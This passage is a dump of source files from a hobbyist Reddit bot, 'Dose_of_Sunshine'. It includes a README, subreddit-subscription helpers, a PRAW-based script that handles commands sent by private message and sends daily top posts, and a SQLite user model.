subs.\r\n '''\r\n current_subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n unique_subs = [sub for sub in requested if sub not in current_subs]\r\n return \" \" + \" \".join(unique_subs)\r\n\r\ndef remove_subs(user, requested):\r\n '''\r\n Gets the user's current subreddits and compares it to a list of subreddits\r\n they wish to remove. 
Returns a string of updated subscriptions.\r\n '''\r\n current_subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n remaining_subs = [sub for sub in current_subs if sub not in requested]\r\n return \" \".join(remaining_subs)\r\n\r\ndef sanitize(requested):\r\n '''\r\n Lowercase and remove \"/r/\" from inputted subreddits\r\n '''\r\n return [sub.lower().replace(\"/r/\", \"\") for sub in requested]\r\n\r\ndef send_reply(message, code):\r\n '''\r\n Mark a message as read and replies to the message with a given string.\r\n '''\r\n message.mark_read()\r\n message.reply(code)\r\n\r\ndef subreddits_present(user, requested):\r\n '''\r\n Checks to see if the requested subs are in the user's current subs\r\n '''\r\n current_subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n\r\n if set(requested) <= set(current_subs):\r\n return True\r\n return False\r\n" }, { "alpha_fraction": 0.7436527609825134, "alphanum_fraction": 0.7534807324409485, "avg_line_length": 52.08695602416992, "blob_id": "1e3c12503fe37c1275e642cbc0f3dc72a98f09f1", "content_id": "e36684101584606a70c03c1fb99c82cdec90c35f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1221, "license_type": "permissive", "max_line_length": 335, "num_lines": 23, "path": "/README.md", "repo_name": "Lyxpudox/Dose_of_Sunshine", "src_encoding": "UTF-8", "text": "# Dose_of_Sunshine\nA Reddit bot that messages subscribed users of a chosen number of random top posts within the last 24 hours of their selected subreddits.\n\n## About\nI came up with the idea of this bot while browsing reddit and seeing some cute pictures of a cat on /r/aww, so I decided to make a bot that would send me the top posts from /r/aww every morning, hence the name \"Dose_of_Sunshine\". Despite the name, users can subscribe to any subreddit. This bot is also used for my CS50x Final Project.\n\n## How to use\nTo use Dose_of_Sunshine, send a private message to /u/Dose_of_Sunshine with any title and the following body:\n\n`[add/remove/stop/limit/help] [subreddit 1] [subreddit 2] [subreddit 3] ...`\n\nwhere: \n * add: add new subreddits (if not subscribed, the bot will add the user and their subreddits to the database)\n * remove: remove subreddits\n * stop: stop the bot (removes user from database)\n * limit: change the number of posts to be delivered (1-10, inclusive)\n * help: repeats this message\n * subreddits: names of subreddits separated by a space (no /r/ needed)\n \n Make sure that all subreddits are spelled correctly.\n \n ## Contact\n For any comments or questions, please send a message to /u/Thirteen30.\n" }, { "alpha_fraction": 0.5841266512870789, "alphanum_fraction": 0.5896109342575073, "avg_line_length": 36.197628021240234, "blob_id": "1efef6d34883bfcc9ca1e2fdef06eeb40f6033c6", "content_id": "4c2b434b6524e0ca963277749afa1e69c1e7b6e8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9664, "license_type": "permissive", "max_line_length": 625, "num_lines": 253, "path": "/dose_of_sunshine.py", "repo_name": "Lyxpudox/Dose_of_Sunshine", "src_encoding": "UTF-8", "text": "\"\"\"\r\nA Reddit bot that messages subscribed users of a chosen number of random top posts within the\r\nlast 24 hours of their selected subreddits. 
The name \"Dose_Of_Sunshine\" came from the original\r\nidea to send users pictures from /r/aww every morning.\r\n\r\nCreated by Tony Vo (/u/Thirteen30) 2017\r\n\r\nLicense: MIT License\r\n\"\"\"\r\nimport praw\r\n\r\nimport datetime\r\nimport sys\r\nimport threading\r\nimport time\r\n\r\nfrom models import db, User\r\nfrom helpers import *\r\n\r\n# Constants of messages that can be sent to the user, indicating success or failure\r\nMESSAGE_ALREADY_SUBBED = \"You are already subscribed to all of the given subreddits.\"\r\nMESSAGE_EMPTY_SUBS = \"You must provide at least one subreddit.\"\r\nMESSAGE_HELP = \"To use Dose_Of_Sunshine, send a message with any title and the body containing: \\n\\n`[add/remove/stop/limit/help] [subreddit 1] [subreddit 2] [subreddit 3] ...` \\n\\n where:\\n\\n * add: add new subreddits (if not subscribed, the bot will add you and your subreddits to the database)\\n * remove: remove subreddits\\n * stop: stop the bot (removes you from database)\\n * limit: change the number of posts to be delivered (1 to 10, inclusive)\\n * help: repeats this message\\n * subreddits: name of subreddits separated by a space (no /r/ needed)\\n\\n Please make sure that the subreddit names are correctly spelled.\"\r\nMESSAGE_INVALID = \"Invalid command. \\n\\n \" + MESSAGE_HELP\r\nMESSAGE_LIMIT_INVALID = \"Invalid limit. Limits must be between 1 and 10, inclusive.\"\r\nMESSAGE_NEW_USER = \"You are now subscribed to Dose_Of_Sunshine! The subreddits you are currently subscribed to are: \\n\\n\"\r\nMESSAGE_NOT_SUBSCRIBED = \"You are not subscribed to Dose_Of_Sunshine!\"\r\nMESSAGE_STOP = \"You are now unsubscribed from Dose_Of_Sunshine. We're sad to see you go. :(\"\r\nMESSAGE_SUBS_NOT_PRESENT = \"You are not subscribed to one or more of the given subreddits.\"\r\nMESSAGE_UPDATE_LIMIT = \"You have now updated your limit of posts to \"\r\nMESSAGE_UPDATED = \"You've updated your subscriptions. You are now subscribed to: \\n\\n\"\r\n\r\n# Header and footer of daily posts\r\nHEADER = \"Enjoy your daily dose of sunshine: \\n\"\r\nFOOTER = \"\\n Have a nice day! 
:) \\n\\n Bot created by /u/Thirteen30 | [Source code](https://github.com/Lyxpudox/Dose_of_Sunshine)\"\r\n\r\n# Send posts at 8:00 AM\r\nLAUNCH_HOUR = 8\r\nLAUNCH_MINUTE = 00\r\n\r\n# Boolean to indicate that all threads should exit (on KeyboardInterrupt)\r\nexit_app = False\r\n\r\ndef authenticate():\r\n \"\"\"\r\n Authenticates bot using praw.ini file and returns Reddit object.\r\n \"\"\"\r\n print(\"Authenticating...\\n\")\r\n reddit = praw.Reddit(\"dose_of_sunshine\", user_agent = \"web:Dose_Of_Sunshine:v0.1 (by /u/Thirteen30)\")\r\n print(\"Authenticated as {}.\\n\".format(reddit.user.me()))\r\n return reddit\r\n\r\ndef messages_handler(reddit):\r\n \"\"\"\r\n Handles users' commands via PM.\r\n \"\"\"\r\n # Get all unread messages\r\n for message in reddit.inbox.unread(limit = None):\r\n\r\n # Author of the message\r\n author = message.author.name\r\n\r\n # See if user is present in database\r\n user = User.select().where(User.username == author).first()\r\n\r\n # Get all subreddits after command\r\n components = message.body.split(\" \")\r\n command = components[0].lower()\r\n\r\n # Possible commands\r\n commands = [\"add\", \"help\", \"stop\", \"remove\", \"limit\"]\r\n\r\n # Commands that require the user to be in the database\r\n registered_required = commands[2:]\r\n\r\n # Commands that require the user not to be in the database\r\n no_args_required = commands[1:3]\r\n\r\n # Make sure command is valid\r\n if command not in commands:\r\n send_reply(message, MESSAGE_INVALID)\r\n continue\r\n elif command in registered_required and user is None:\r\n send_reply(message, MESSAGE_NOT_SUBSCRIBED)\r\n continue\r\n\r\n # Since the limit command requires an integer rather than a list of subs.\r\n # check if the limit command is issued first\r\n if command == \"limit\":\r\n if len(components[1:]) == 1 and components[1].isdigit():\r\n limit = int(components[1])\r\n\r\n if 1 <= limit <= 10:\r\n user.limit = limit\r\n user.save()\r\n\r\n send_reply(message, MESSAGE_UPDATE_LIMIT + \"{}.\".format(limit))\r\n\r\n print(\"Updated {}\\'s limit to {}.\\n\".format(author, limit))\r\n continue\r\n else:\r\n send_reply(message, MESSAGE_LIMIT_INVALID)\r\n continue\r\n\r\n requested_subs = sanitize(components[1:])\r\n\r\n # Ensure all subreddits are valid\r\n if not check_subreddits(reddit, requested_subs):\r\n send_reply(message, MESSAGE_INVALID)\r\n continue\r\n elif command not in no_args_required and len(requested_subs) == 0:\r\n send_reply(message, MESSAGE_EMPTY_SUBS)\r\n continue\r\n\r\n # Add command (add to subscriptions)\r\n # If subscribe command, check if all subreddits are valid\r\n if command == \"add\":\r\n # If user exists, update subscription list\r\n if user is not None:\r\n # Get subreddits that are not already subscribed\r\n new_subs = get_unique_subreddits(author, requested_subs)\r\n\r\n # If none of the subreddits given are new, return an error\r\n if new_subs.isspace():\r\n send_reply(message, MESSAGE_ALREADY_SUBBED)\r\n continue\r\n\r\n print(\"{} exists in the database. 
Adding {} subs.\\n\".format(author, len(requested_subs)))\r\n\r\n user.subs += new_subs\r\n user.save()\r\n\r\n send_reply(message, concat_subreddits(author, MESSAGE_UPDATED))\r\n continue\r\n\r\n # Else, add the user to the database\r\n else:\r\n User.create(username = author, subs = \" \".join(requested_subs), limit = 3).save()\r\n\r\n send_reply(message, concat_subreddits(author, MESSAGE_NEW_USER))\r\n print(\"User {} was added to the database.\\n\".format(author))\r\n continue\r\n # Remove command (remove from subscriptions)\r\n elif command == \"remove\":\r\n # Check to see if the requested subreddits are in the user's subscriptions\r\n if subreddits_present(author, requested_subs):\r\n print(\"{} exists in the database. Removing {} subs.\\n\".format(author, len(requested_subs)))\r\n\r\n user.subs = remove_subs(author, requested_subs)\r\n user.save()\r\n\r\n send_reply(message, concat_subreddits(author, MESSAGE_UPDATED))\r\n continue\r\n else:\r\n send_reply(message, MESSAGE_SUBS_NOT_PRESENT)\r\n continue\r\n # If user requests to stop, delete from database\r\n elif command == \"stop\":\r\n user.delete_instance()\r\n\r\n send_reply(message, MESSAGE_STOP)\r\n print(\"Deleted {} from the database.\\n\".format(author))\r\n continue\r\n elif command == \"help\":\r\n send_reply(message, MESSAGE_HELP)\r\n continue\r\n\r\ndef check_messages(reddit):\r\n \"\"\"\r\n Check for messages every five minutes and responds accordingly.\r\n \"\"\"\r\n while not exit_app:\r\n number_of_messages = len(list(reddit.inbox.unread(limit = None)))\r\n\r\n if number_of_messages > 0:\r\n print(\"{} message(s) found.\\n\".format(number_of_messages))\r\n\r\n db.connect()\r\n\r\n messages_handler(reddit)\r\n\r\n db.close()\r\n else:\r\n print(\"No messages detected.\\n\")\r\n\r\n time.sleep(300)\r\n\r\ndef send_posts(reddit):\r\n \"\"\"\r\n Chooses the top posts from a user's subscriptions and sends them to the user\r\n via PM.\r\n \"\"\"\r\n while not exit_app:\r\n # Gets current time\r\n now = datetime.datetime.now()\r\n hour, minute = now.hour, now.minute\r\n\r\n if hour == LAUNCH_HOUR and minute == LAUNCH_MINUTE:\r\n print(\"It is now {}:{:02}\".format(LAUNCH_HOUR, LAUNCH_MINUTE))\r\n\r\n db.connect()\r\n\r\n for user in User.select():\r\n limit = user.limit\r\n\r\n images = choose_top_posts(reddit, user.username, limit)\r\n\r\n reddit.redditor(user.username).message(\"Your Daily Dose of Sunshine\", HEADER + \"\".join(images) + FOOTER)\r\n\r\n print(\"Sent daily posts to {}.\".format(user.username))\r\n\r\n db.close()\r\n\r\n time.sleep(30)\r\n\r\ndef main():\r\n \"\"\"\r\n Main function. Creates two threads (one for messages and one for\r\n sending posts) to run loops concurrently.\r\n \"\"\"\r\n reddit = authenticate()\r\n\r\n messages_thread = threading.Thread(name=\"messages\",\r\n target=check_messages,\r\n args=[reddit],\r\n daemon=True)\r\n\r\n posts_thread = threading.Thread(name=\"posts\",\r\n target=send_posts,\r\n args=[reddit],\r\n daemon=True)\r\n\r\n messages_thread.start()\r\n posts_thread.start()\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n When KeyboardInterrupt has been called, set exit_app to false to kill\r\n all threads and exit the program.\r\n \"\"\"\r\n try:\r\n main()\r\n\r\n # Keeps program running by inducing a permanent loop until interrupt\r\n while True:\r\n time.sleep(0.1)\r\n\r\n except KeyboardInterrupt:\r\n print(\"Finished all tasks. 
Closing down...\")\r\n\r\n exit_app = True\r\n\r\n sys.exit()\r\n" }, { "alpha_fraction": 0.6361746191978455, "alphanum_fraction": 0.6424116492271423, "avg_line_length": 26.294116973876953, "blob_id": "637641fc5b8e951fb6ea9481cfb773f40f429589", "content_id": "211038ac07572829cfb95632cbb27839a877368a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "permissive", "max_line_length": 91, "num_lines": 17, "path": "/models.py", "repo_name": "Lyxpudox/Dose_of_Sunshine", "src_encoding": "UTF-8", "text": "from peewee import *\r\n\r\ndb = SqliteDatabase(\"users.db\")\r\n\r\nclass User(Model):\r\n '''\r\n Model for each user that subscribes to the bot.\r\n username = username of the user who is subscribed to the bot\r\n subs = the subreddits they are subscribed to\r\n limit = integer from 1 to 10 (inclusive) that tells of how many posts will be delivered\r\n '''\r\n username = CharField()\r\n subs = CharField()\r\n limit = IntegerField()\r\n\r\n class Meta:\r\n database = db\r\n" } ]
4
LegGnom/PySync
https://github.com/LegGnom/PySync
0e1b96dd5aabfe4ee2681ec83e0141d04b6479c9
a6065f5416bd50a973f9b38eef646a5a69a45ed5
1b83fb7485964b0128fdbc9b10f84a03a4e9bbb4
refs/heads/master
2016-09-08T11:55:01.677437
2015-01-17T17:52:49
2015-01-17T17:52:51
29,398,023
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.40942028164863586, "alphanum_fraction": 0.4492753744125366, "avg_line_length": 19.35714340209961, "blob_id": "348ccec60f59e340676130150d6d623f356a4f2b", "content_id": "eddfeeddc2cc8705f931a070f102ea545249a6fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 56, "num_lines": 14, "path": "/init.py", "repo_name": "LegGnom/PySync", "src_encoding": "UTF-8", "text": "import watcher\n\nwatcher.init({\n    'ssh': {\n        'host': '192.168.56.101',\n        'user': 'root',\n        'pass': 'zubr12229'\n    },\n    'remotepath': '/var/www/',\n    'localpath': '/Users/leggnom/Desktop/-=Projects=-/',\n    'ignore': [\n        # '/.idea/'\n    ]\n})\n\n\n\n\n\n" }, { "alpha_fraction": 0.5716878175735474, "alphanum_fraction": 0.5747126340866089, "avg_line_length": 25.8125, "blob_id": "0771d7e534e49019ac7dbdadb8643c6ed7ee72fa", "content_id": "6f5023df6b6763889ef9c723ee343e2584c877fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1653, "license_type": "no_license", "max_line_length": 106, "num_lines": 64, "path": "/watcher.py", "repo_name": "LegGnom/PySync", "src_encoding": "UTF-8", "text": "import time\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\nimport os.path\nfrom ssh import SSH\n\nclass Watcher(PatternMatchingEventHandler):\n\n    options = {}\n\n    def __init__(self, options):\n        PatternMatchingEventHandler.__init__(self)\n        self.options = options\n\n        ssh = options['ssh']\n        port = 22\n        if 'port' in ssh:\n            port = ssh['port']\n\n        self.ssh = SSH(\n            host=ssh['host'],\n            user=ssh['user'],\n            password=ssh['pass'],\n            port=port\n        )\n\n        if self.options['remotepath'][-1] != '/':\n            self.options['remotepath'] += '/'\n\n    def process(self, event):\n        if not os.path.isfile(event.src_path) and os.path.exists(event.src_path):\n            return\n\n        if 'ignore' in self.options:\n            for item in self.options['ignore']:\n                if item in event.src_path:\n                    return\n\n        path = event.src_path.strip('/').split('/')[len(self.options['localpath'].strip('/').split('/')):]\n        path = '/'.join(path)\n        remotepath = self.options['remotepath'] + path\n        self.ssh.upload(remotepath, event.src_path)\n\n\n    def on_modified(self, event):\n        self.process(event)\n\n    def on_created(self, event):\n        self.process(event)\n\n\ndef init(options):\n    args = [options['localpath']]\n    observer = Observer()\n    observer.schedule(Watcher(options=options), path=args[0], recursive=True)\n    observer.start()\n\n    try:\n        while True:\n            time.sleep(1)\n    except KeyboardInterrupt:\n        observer.stop()\n\n    observer.join()\n\n" }, { "alpha_fraction": 0.5854922533035278, "alphanum_fraction": 0.5928941369056702, "avg_line_length": 26.020000457763672, "blob_id": "b77f62173bdcc2068f5406727a807ad10d4461b1", "content_id": "df78fa468051271dc53801cf1224e5f7df23698f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1351, "license_type": "no_license", "max_line_length": 70, "num_lines": 50, "path": "/ssh.py", "repo_name": "LegGnom/PySync", "src_encoding": "UTF-8", "text": "import paramiko\nimport os\n\nhost = '192.168.0.8'\nuser = 'login'\nsecret = 'password'\nport = 22\n\n\nclass SSH ():\n\n    sftp = ''\n    transport = ''\n\n    def __init__(self, host, user, password, port):\n        self.transport = paramiko.Transport((host, port))\n        self.transport.connect(username=user, password=password)\n        self.sftp = paramiko.SFTPClient.from_transport(self.transport)\n\n    def upload(self, remotepath, localpath):\n        try:\n            self.sftp.put(localpath, remotepath)\n        except IOError:\n            remote_dirname, basename = os.path.split(remotepath)\n            self.mkdir(remote_dirname)\n            self.sftp.put(localpath, remotepath)\n\n    def download(self, remotepath, localpath):\n        self.sftp.get(remotepath, localpath)\n\n    def mkdir(self, remote_directory):\n        if remote_directory == '/':\n            self.sftp.chdir('/')\n            return\n        if remote_directory == '':\n            return\n        remote_dirname, basename = os.path.split(remote_directory)\n        self.mkdir(os.path.dirname(remote_directory))\n        try:\n            self.sftp.chdir(basename)\n        except IOError:\n            self.sftp.mkdir(basename)\n            self.sftp.chdir(basename)\n\n    def close(self):\n        self.sftp.close()\n        self.transport.close()\n\n    def __exit__(self, exc_type, exc_value, traceback):\n        self.close()\n" }, { "alpha_fraction": 0.46254071593284607, "alphanum_fraction": 0.49837133288383484, "avg_line_length": 17.05555534362793, "blob_id": "e7d791b6b1298a94212da227d215f1a4d4816204", "content_id": "3c3e83a9c43020ddead25cbd33fb9a763abce5ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 350, "license_type": "no_license", "max_line_length": 51, "num_lines": 18, "path": "/README.md", "repo_name": "LegGnom/PySync", "src_encoding": "UTF-8", "text": "# PySync\n\nA utility for one-way file synchronization over SSH\n\nIn init.py \n\nwatcher.init({\n    'ssh': {\n        'host': '192.168.56.101',\n        'user': 'user',\n        'pass': 'pass'\n    },\n    'remotepath': '/var/www/',\n    'localpath': '/path/to/watch/',\n    'ignore': [\n        '/.idea/'\n    ]\n})\n" } ]
4
onetop21/interrupt_handler
https://github.com/onetop21/interrupt_handler
c021cbb6dc1d41202a0abcbc97e5e4c1021b5b0e
f6e4c4fd663693e02c4a6604e335e91ef9a6ffe8
72c0d0386ae8a0c1a42889611131f95e40b72e26
refs/heads/main
2023-09-03T08:39:48.682106
2021-10-24T13:14:54
2021-10-24T13:14:54
374,836,335
1
0
MIT
2021-06-08T00:37:28
2021-06-10T07:44:54
2021-06-10T09:18:28
Python
[ { "alpha_fraction": 0.6745561957359314, "alphanum_fraction": 0.6745561957359314, "avg_line_length": 23.285715103149414, "blob_id": "7fc53508098826a4d948fce3cf25eb82e1535dd0", "content_id": "2f59c4ae6519f888de364e081e4f7aaeb0220bb2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "permissive", "max_line_length": 56, "num_lines": 7, "path": "/interrupt_handler/default_callback.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "import sys\n\ndef default_callback(message='Aborted.', blocked=False):\n def wrapper():\n print(message, file=sys.stderr)\n return blocked\n return wrapper" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5841270089149475, "avg_line_length": 36.05882263183594, "blob_id": "4fac8409922e764054f6662b7dd0ab6d3c20860c", "content_id": "6be7dbdf3e38953294c8a68cdc629594db384006", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 630, "license_type": "permissive", "max_line_length": 86, "num_lines": 17, "path": "/.test/test.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "import time\nfrom interrupt_handler import InterruptHandler, default_callback\n\nif __name__ == '__main__':\n import time\n main_loop = True\n sub_loop = True\n with InterruptHandler(default_callback('Locked', True), propagate=True) as h1:\n while not h1.interrupted:\n print(f'MainLoop {time.time()}, {h1}, {h1.interrupted}')\n with InterruptHandler(default_callback('Message2'), propagate=True) as h2:\n while sub_loop:\n print(f'SubLoop {time.time()}')\n time.sleep(1)\n sub_loop = False\n time.sleep(1)\n main_loop = False\n" }, { "alpha_fraction": 0.6338438987731934, "alphanum_fraction": 0.6396790742874146, "avg_line_length": 20.761905670166016, "blob_id": "6d86313d5a1a6a13cd428c165b9f643a6ff707ae", "content_id": "9710ee9b7f95454d4344f9d29435302cdf636d14", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1371, "license_type": "permissive", "max_line_length": 70, "num_lines": 63, "path": "/README.md", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "# Interrupt Handler\nInterrupt Handling Util for Python.\n\n## Installation\n```bash\n$ pip install InterruptHandler\n```\n\n## How to Use\n```python\nfrom interrupt_handler import InterruptHandler\n\n# Break by Keyboard Interrupt (Default)\nwith InterruptHandler() as h:\n ...\n \n# Break by checking interrupted flag.\nwith InterruptHandler(lambda: True) as h:\n if h.interrupted:\n break\n ...\n \n \n# Propagate signal to parent.\nwith InterruptHandler():\n with InterruptHandler(propagate=True):\n ...\n```\n \n### Callback customize\n#### return False\n> Escape 'with statement' forcley.\n#### return True\n> Switch 'interrupted flag'.\n``` python\ndef callback():\n print('Interrupted by User.')\n return False\n \nwith InterruptHandler(callback) as h:\n ...\n```\n\n## Example\n```python\nimport time\nfrom interrupt_handler import InterruptHandler, default_callback\n\nif __name__ == '__main__':\n import time\n main_loop = True\n sub_loop = True\n with InterruptHandler(default_callback('Locked', True)) as h1:\n while not h1.interrupted:\n print(f'MainLoop {time.time()}, {h1}, {h1.interrupted}')\n with InterruptHandler(default_callback('Message2')) as h2:\n while sub_loop:\n print(f'SubLoop {time.time()}')\n time.sleep(1)\n sub_loop = False\n 
time.sleep(1)\n main_loop = False\n```\n" }, { "alpha_fraction": 0.6127167344093323, "alphanum_fraction": 0.6173410415649414, "avg_line_length": 26.935483932495117, "blob_id": "31ad11f7496c10f4227aa71f35e6d51a726e974d", "content_id": "0146becf37c4cb0f6b955248952db4e810c4809e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 865, "license_type": "permissive", "max_line_length": 62, "num_lines": 31, "path": "/setup.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "import sys\nimport os\nfrom setuptools import setup, find_packages\nfrom interrupt_handler import __version__\n\ndef main():\n # Read Description form file\n try:\n with open('README.rst') as f:\n description = f.read()\n except:\n print('Cannot find README.md file.', file=sys.stderr)\n description = \"Interrupt Handling Utility for Python.\"\n\n setup(\n name='InterruptHandler',\n version=__version__,\n description='Interrupt Handling Library for Python.',\n long_description=description,\n author='Hyoil LEE',\n author_email='[email protected]',\n license='MIT License',\n packages=find_packages(exclude=['.temp', '.test']),\n url='https://github.com/onetop21/interrupt_handler.git',\n zip_safe=False,\n python_requires='>=3.0',\n install_requires=[],\n )\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6129032373428345, "alphanum_fraction": 0.6221198439598083, "avg_line_length": 13.466666221618652, "blob_id": "5c35f07c968b50c52c3caf2ba872ad88d911ff99", "content_id": "842f31d5789859e28e80f614b044274f7bb9bd8a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 217, "license_type": "permissive", "max_line_length": 53, "num_lines": 15, "path": "/README.rst", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "Interrupt Handler\n=================\n\nInterrupt Handling Util for Python.\n\nInstallation\n==============\n\n$ pip install InterruptHandler\n\n\nHow To Use\n==============\n\nVisit : https://github.com/onetop21/interrupt_handler\n" }, { "alpha_fraction": 0.5973197221755981, "alphanum_fraction": 0.5973197221755981, "avg_line_length": 30.979591369628906, "blob_id": "d98f2e058e8ba52a6ea5cee4c6d26bc16a5150bc", "content_id": "9c41d358aea7132df915750ec629ae7bd4ea37f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1567, "license_type": "permissive", "max_line_length": 88, "num_lines": 49, "path": "/interrupt_handler/interrupt_handler.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport signal\nfrom .default_callback import default_callback\n\nclass InterruptHandler(object):\n def __init__(self, callback=default_callback(), sig=signal.SIGINT, propagate=False):\n if not callable(callback):\n raise ValueError(f'callback parameter is not support {type(callback)}.')\n self.callback = callback\n self.sig = sig\n self.propagate = propagate\n self.original_handler = None\n\n @property\n def interrupted(self):\n return getattr(self, '_interrupted', False)\n\n def __enter__(self):\n self.initialize()\n return self\n\n def __exit__(self, type, value, tb):\n return self.release()\n\n def initialize(self):\n if not self.original_handler:\n self._interrupted = False\n self.released = False\n self.original_handler = signal.getsignal(self.sig)\n def handler(signum, frame):\n if not self.callback():\n self.release(True)\n 
self._interrupted = True\n signal.signal(self.sig, handler)\n else:\n raise RuntimeError('Already initialized.')\n\n def release(self, interrupted=False):\n if self.released:\n if self.propagate:\n os.kill(os.getpid(), self.sig)\n return True\n if self.original_handler:\n signal.signal(self.sig, self.original_handler)\n self.original_handler = None\n self.released = True\n if interrupted: raise KeyboardInterrupt\n return False\n" }, { "alpha_fraction": 0.7542372941970825, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 28.5, "blob_id": "13093d40ac26e8f73a6fab460f86051b25f1802e", "content_id": "e57505bf7eebdfee7efb5692715b1e42cd40dc90", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "permissive", "max_line_length": 47, "num_lines": 4, "path": "/interrupt_handler/__init__.py", "repo_name": "onetop21/interrupt_handler", "src_encoding": "UTF-8", "text": "from .interrupt_handler import InterruptHandler\nfrom .default_callback import default_callback\n\n__version__ = '0.0.4'\n" } ]
7
cornelltech/visaware
https://github.com/cornelltech/visaware
f7f111f62cb41a32c861cf1dc78575c036d35cb9
ea50d1d288c8af845176bcf761db15e6b18230a6
899289e4e448b0ced0df9d38c35fb00f951058e3
refs/heads/master
2021-03-22T00:13:59.265418
2018-12-10T16:04:39
2018-12-10T16:04:39
114,006,261
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5726072788238525, "alphanum_fraction": 0.5866971015930176, "avg_line_length": 34.01333236694336, "blob_id": "580a6dd6e0a1eab3f59f428063d9fbac8623aa27", "content_id": "659ee27cebd3e41dcaea2abf25697ce9213248ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7878, "license_type": "no_license", "max_line_length": 79, "num_lines": 225, "path": "/active_wall/active_wall.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"knn.py\"\"\"\n\nimport time\nimport sys\nimport cv2\nimport numpy as np\nfrom gray import Gray\n\n# a silhouette can not have MORE than this number of pixels\nNO_MORE_THAN = 30000\n# a silhouette can not have LESS than this number of pixels\nNO_LESS_THAN = 10000\n# a silhouette cannot be closer than INNER_MARGIN pixels from the border\nINNER_MARGIN = 10\n\n# KNN background subtractor history param\nKNN_HISTORY = 10\n# KNN background subtractor threshold param\nKNN_THRESH = 500.0\n\n# Min # of nonzero pixels for us to believe there's motion\nMOTION_MIN_NNZ = 100\n\n# how long do we wait before we start timing things?\nIDLE_START_TIME = 0.5\n\n# vertical margin for drawing\nHEIGHT_MARGIN = 100\n\n# if TIME_DECAY_FACTOR < 1.0, the image values are less bright by this fraction\n# if TIME_DECAY_FACTOR == 1.0, the image decays completely on every frame\nTIME_DECAY_FACTOR = 0.0001\n\n# how much to decay all other people by (i.e. to multiply them by\n# PERSON_DECAY_FACTOR) when a new person comes into the picture\nPERSON_DECAY_FACTOR = 0.8\n\n# number of pixels to translate to the right each time\nHORIZONTAL_TRANSLATION = 30\n\nclass MaxKNN(Gray):\n \"\"\"KNN background subtraction\"\"\"\n def __init__(self, stream, *args, **kwargs):\n super().__init__(stream, *args, **kwargs)\n self.fgbg = cv2.createBackgroundSubtractorKNN(\n KNN_HISTORY, KNN_THRESH, False)\n self.start_time = time.time()\n self.moving = False\n self.max_nnz = 0\n self.max_i = 0\n self.subimg = None\n self.i_frame = 0\n self.disp_img = None\n self.start_x = 0\n self.last_time = time.time()\n\n def process_frame(self, frame):\n \"\"\"KNN background subtraction\"\"\"\n\n cv2.imshow('normal', frame)\n cv2.waitKey(1)\n\n gray = super().process_frame(frame)\n\n knn_img = self.fgbg.apply(gray)\n\n nnz = cv2.countNonZero(knn_img)\n\n frame_shape = frame.shape\n img_h = frame_shape[0]\n img_w = frame_shape[1]\n\n if self.disp_img is None:\n self.disp_img = np.zeros((img_h, img_w))\n\n rect = cv2.boundingRect(knn_img)\n bb_x, bb_y, bb_w, bb_h = rect\n\n # Keep track of subimage with max nonzero # of pixels:\n # this block checks if the number of nonzero (background difference)\n # pixels amount and location satisfies what we think would be an ok\n # silhouette. if it does satisfy those conditions, then we remember\n # the sub-image that had it, plus the number of nnz pixels is\n # remembered - it is the max nnz, because one of the conditions for\n # nnz is that it is greater than the max so far\n if nnz > self.max_nnz and \\\n nnz < NO_MORE_THAN and \\\n nnz > NO_LESS_THAN and \\\n bb_x > INNER_MARGIN and \\\n bb_x + bb_w < img_w - INNER_MARGIN:\n\n # print('- found next candidate: ', self.grabbed_frame_num())\n # found the next candidate silhouette to use\n self.max_nnz = nnz\n\n # crop rect into max_img\n # self.subimg = knn_img.copy()\n self.subimg = cv2.convertScaleAbs(\n knn_img[bb_y:bb_y + bb_h, bb_x:bb_x+bb_w])\n\n # TODO: why returning knn_img here? 
